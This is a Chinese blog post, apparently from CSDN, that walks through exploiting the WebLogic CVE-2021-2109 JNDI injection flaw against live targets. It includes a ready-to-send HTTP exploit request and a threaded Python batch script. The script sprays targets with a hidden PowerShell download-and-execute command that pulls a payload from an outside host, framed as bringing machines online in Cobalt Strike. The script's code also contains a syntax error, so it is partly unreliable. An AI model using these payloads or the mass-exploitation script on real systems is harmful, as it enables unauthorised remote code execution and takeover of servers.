CVE-2021-2109

最新推荐文章于 2024-05-29 12:38:45 发布
最新推荐文章于 2024-05-29 12:38:45 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: weblogic漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43899495/article/details/113555669
版权

漏洞检测
访问url:http://xxx.xxx.xxx/console/css/%252e%252e/consolejndi.portal
如果出现未授权访问则一般可以直接打了,由于这个漏洞的利用过程就需要目标服务器访问自己vps上的服务,所以只要能利用那目标肯定是要能出网的,那就是CS的战场了

漏洞复现
网上很多,我简单过一遍
在vps上开启服务:
java -jar JNDIExploit-v1.11.jar -i [vps_ip]

JNDIExploit-v1.11.jar文件见附件
修改一下ip然后直接发包打就可以了(xx是目标,yy是自己的vps):

数据包:
GET http://xxx.xxx.xxx/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://yy.yy.yy;yy:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1 Host: xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate cmd: whoami Connection: close Cookie: ADMINCONSOLESESSION=1TMygM7C2dqR37SN9bCmnPwW6lKDt3ckknnbCvkpSqmZ43vCpvw2!-1136623495 Upgrade-Insecure-Requests: 1

批量脚本源码(这个只是利用powershell上线windows,在当前目录下创建websites.txt,里面放检测的url):
`#coding: utf-8
import os
import time
import requests
import threading,queue,urllib3

q=queue.Queue()
urllib3.disable_warnings()

#处理文件
file = open(‘websites.txt’,encoding=”unicode_escape”)
for x in file.readlines():
if ‘http://‘ in x.strip() or ‘https://‘ in x.strip():
q.put(x.strip())
else:
q.put(‘http://‘ + x.strip())

#测试代理
proxies = {
‘http’:’127.0.0.1:8080’,
‘https’:’127.0.0.1:8080’
}

#请求头
headers = {
“User-Agent”: “Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)”,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2”,
“cmd”:”powershell.exe -nop -w hidden -c \“IEX ((new-object net.webclient).downloadstring(‘http://192.168.15.184:80/a’))"",
“Content-Type”:”application/x-www-form-urlencoded”
}

#扫描函数
def scan():
while not q.empty():
u=q.get()
url=u+”/console/css/%252e%252e/consolejndi.portal?pageLabel=JNDIBindingPageGeneral&nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.15;184:1389/Basic/WeblogicEcho;AdminServer%22)”
try:
res=requests.get(url, headers=headers,verify=False,allow_redirects=False,timeout=20)
else:
pass
except:
pass
lock = threading.Lock()
th=[]
th_num=30
for x in range(th_num):
t=threading.Thread(target=scan)
th.append(t)
for x in range(th_num):
th[x].start()
for x in range(th_num):
th[x].join()
`

附件
cve-2021-2109批量.py
JNDIExploit-v1.11.jar

老鄧头
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-26855
03-12
我已经在为中国读者翻译了中文漏洞利用程序,对于不熟悉golang的人,请看png图片
Jackson CVE-2021-20190 SSRF
王嘟嘟的博客
03-13 1078
还是黑名单的绕过,等这篇写完我也去混一个试试小于2.9.10.7。
CVE-2021-44228漏洞复现
最新发布
m0_65764670的博客
05-29 1292
此漏洞为log4j2漏洞,log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
CVE-2021-21166
weixin_48300170的博客
07-14 1162
CVE-2021-21166 Chrome 远程代码执行0 Day 漏洞复现漏洞简介漏洞信息漏洞原理环境搭建漏洞复现漏洞修复 漏洞简介       在2021年2月11日,微软浏览器漏洞研究团队的研究员 Alison Huffman提交一个0day漏洞。       一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 docker push darryk/dev:1.0 现在,您可以将使用Node.js应用程序创建的映像部署到您的K8s集群中。 webhook-deploy.yaml将在群集中部署所有必需的组件。 kubectl apply -f webhook-d
CVE-2021-21972
温和的跳跃
03-01 1052
新出来的cve要乘早。不然啥都没有了。 https://www.cnblogs.com/cn-gov/p/14461291.html 这个漏洞有好几种利用方式,(感觉通过代码审计找到的漏洞)主要的原因是 未授权上传漏洞,同时知道上传路径而且这个路径没有经过过滤就是可以目录穿越。还可以利用ssh连接https://swarm.ptsecurity.com/unauth-rce-vmware/ ...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2021-2109:通过JNDICVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0和14.1.1.0.0。... 成功攻击此漏洞可能导致Oracle ...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
CVE-2021-26855:CVE-2021-26855 exp
03-08
CVE-2021-26855 CVE-2021-26855 ssrf简单利用golang练习 影响版本 Exchange Server 2013小于CU23 Exchange Server 2016小于CU18 Exchange Server 2019小于CU7 利用条件 该突破性常规的交换漏洞,此突破并没有一个可登录的用户身份,可以在未授权的情况下获取内部用户资源,配合CVE-2021-27065可以实现远程命令执行。 进攻触发必要条件 目标服务器存在漏洞 目标交换服务器必须为负载均衡服务器,即同时使用两台及以上服务器 目标邮箱地址,注意,该地址需要为域内邮件地址而非邮箱地址,同时存在差异 攻击者还必须标识内部Exchange服务器的完全限定域名(FQDN) 以上四项中,FQDN可以通过ntlm type2消息抓取;邮件地址可以直接枚举。 使用说明 这一突破利用,使用脚本语言如ruby
CVE-2021-2109 )Weblogic Server远程代码执行漏洞复现
m0_48520508的博客
02-02 1785
0x00简介 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 0x01漏洞概述 该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。 0x02影响版本 We
Weblogic 远程代码执行漏洞:CVE-2021-2109复现
Jietewang的博客
01-25 4181
前言 什么是LDAP?Lightweight Directory Access Protocol轻量目录访问协议,基于X.500协议,相对简单且支持定制。于X.500不同的是LDAP支持TCP/IP。 本文主要复现编号为CVE-2021-2109的Weblogic JNDI注入远程命令执行漏洞,该漏洞风险为“高”。 影响版本:Weblogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0 1. 环境搭建 本次实验使用的靶.
CVE-2021-2109 Weblogic Server远程代码执行漏洞
m0_56642842的博客
06-24 3131
0x00 简介 WebLogic是美国甲骨文公司出品的一个application server(应用服务器),确切的说是一个基于JAVAEE架构的中间件,WebLogic主要用于开发、继承、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 0x01 漏洞概述 CVE-2021-2109是存在于WebLogic Server的console中的一个远程代码执行漏洞,经过身份验证的攻击者可以直接通过JNDI远程执行命令或者注入代码,可以配合CVE-2020-14882未授权漏洞执行任意
Log4j2远程代码执行漏洞(cve-2021-44228)复现
citytwilight的博客
05-22 2718
Log4j2远程代码执行漏洞(cve-2021-44228)复现(反弹shell)
Weblogic远程代码执行分析复现(CVE-2021-2109
黑白的博客
05-03 876
声明 好好学习,天天向上 漏洞描述 编号:CVE-2021-2109 Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 影响范围 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.
CVE-2021-2109 Weblogic Server远程代码执行
thelostworld
01-21 4412
CVE-2021-2109 Weblogic远程代码执行 ​ 一、漏洞简介 Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0..
CVE-2021-2109:Weblogic Server远程代码执行漏洞验证及修复
weixin_38896449的博客
03-25 1709
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 2021年1月20日,Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。 2.影响版本 Weblogic Server 10
CVE-2021-28041复现
03-13
CVE-2021-28041是一个安全漏洞,它影响了某个软件或系统的特定版本。由于我无法得知你具体指的是哪个软件或系统的CVE-2021-28041漏洞,因此无法提供具体的复现步骤。但是,我可以给你一些一般性的复现漏洞的方法和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值